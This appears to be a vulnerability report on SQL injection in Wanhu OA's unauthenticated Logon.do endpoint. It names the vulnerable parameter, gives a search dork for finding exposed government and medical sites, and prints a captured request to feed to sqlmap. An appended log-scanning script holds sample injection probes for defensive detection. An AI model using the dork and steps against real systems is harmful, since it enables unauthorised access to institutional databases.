### Brief description:

Wanhu OA (万户OA): generic SQL injection in one page (affects N government and medical-institution sites)

### Details:

defaultroot/Logon.do can be reached without authorization, and because the app_instance_id parameter is not strictly filtered, the result is SQL injection.

Problem parameter: app_instance_id

EXP: defaultroot/Logon.do

Exploitation method: open the page, enter arbitrary content, capture the request with a proxy, and run it through sqlmap~~~

Affected cases:

- **.**.**.**:7001/defaultroot/aep/login.jsp
- http://**.**.**.**/defaultroot/aep/login.jsp
- http://**.**.**.**:7001/defaultroot/Logon.do
- **.**.**.**:7001/defaultroot/aep/login.jsp

Found via Baidu search:

https://**.**.**.**/s?wd=inurl%3Adefaultroot%2F&rsv_spt=1&issp=1&f=8&rsv_bp=0&rsv_idx=2&ie=utf-8&tn=baiduhome_pg&rsv_enter=1&rsv_sug3=5&rsv_sug1=4&rsv_n=2&rsv_sug2=0&inputT=2953&rsv_sug4=2953

Captured POST request:

```http
POST /defaultroot/Logon.do HTTP/1.1
Host: **.**.**.**:7001
Connection: keep-alive
Content-Length: 41
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Origin: **.**.**.**:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.95 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded
Referer: **.**.**.**:7001/defaultroot/aep/login.jsp
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: LocLan=zh_cn; JSESSIONID=Gp2TVdvDF7Yf2VdJNKC8Ql62vFJLZbfXqQ3LwhZp75XfSGQb1pCn!-1516176646; ezofficeUserName=; ezofficeDomainAccount=whir

app_instance_id=11&user_id=111&userType=0
```

![2.jpg](https://images.seebug.org/upload/201508/261144590688d6513ace327f7b9dd8356b3fac09.jpg)

![1.jpg](https://images.seebug.org/upload/201508/2611451207ae12e86948e42e82d06da24575b4c2.jpg)

![3.jpg](https://images.seebug.org/upload/201508/2611455962b7b1a66b9b31c809312885ff2ca1ae.jpg)

### Proof of vulnerability:

See above~~
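From the defender's side, an added example (not part of the original report) that checks the three parameters of the captured Logon.do request against the numeric shape the legitimate body shows; the proxy-log line format and the assumption that app_instance_id, user_id and userType are always integers are mine, not the vendor's.

```python
"""Added example: validate Logon.do POST parameters from a proxy/access log."""
import re
from urllib.parse import parse_qs

# Assumption (not stated in the advisory): the parameters of the captured
# request are numeric identifiers, so any other value is worth alerting on.
EXPECTED = {
    "app_instance_id": re.compile(r"\d{1,10}"),
    "user_id": re.compile(r"\d{1,10}"),
    "userType": re.compile(r"\d{1,2}"),
}
LOGON_PATH = "/defaultroot/Logon.do"


def check_logon_body(body: str) -> list:
    """Return the parameter names whose URL-decoded value is not numeric."""
    params = parse_qs(body, keep_blank_values=True)
    return [
        name for name, pattern in EXPECTED.items()
        for value in params.get(name, [])
        if not pattern.fullmatch(value)
    ]


def scan_log(lines) -> list:
    """Return (line_no, bad_params) for Logon.do POSTs that fail validation.

    Constructed line format: 'METHOD PATH BODY' with the body URL-encoded,
    so decoding happens in parse_qs before the value is validated.
    """
    hits = []
    for n, line in enumerate(lines, 1):
        parts = line.split(" ", 2)
        if len(parts) != 3 or parts[0] != "POST" or parts[1] != LOGON_PATH:
            continue
        bad = check_logon_body(parts[2])
        if bad:
            hits.append((n, bad))
    return hits


# Constructed sample log: line 1 is the advisory's benign body; the others
# carry non-numeric values of the kind an injection scanner would submit.
SAMPLE_LOG = [
    "POST /defaultroot/Logon.do app_instance_id=11&user_id=111&userType=0",
    "GET /defaultroot/aep/login.jsp -",
    "POST /defaultroot/Logon.do app_instance_id=11%27&user_id=111&userType=0",
    "POST /defaultroot/Logon.do app_instance_id=11%20AND%201%3D1&user_id=111&userType=0",
    "POST /defaultroot/Logon.do app_instance_id=&user_id=111&userType=0",
]

if __name__ == "__main__":
    for line_no, bad in scan_log(SAMPLE_LOG):
        print(f"line {line_no}: suspicious {', '.join(bad)}")
```

The same numeric check belongs in the application itself (parse the value as an integer and bind it as a query parameter); the log scan only tells you whether the field is being probed.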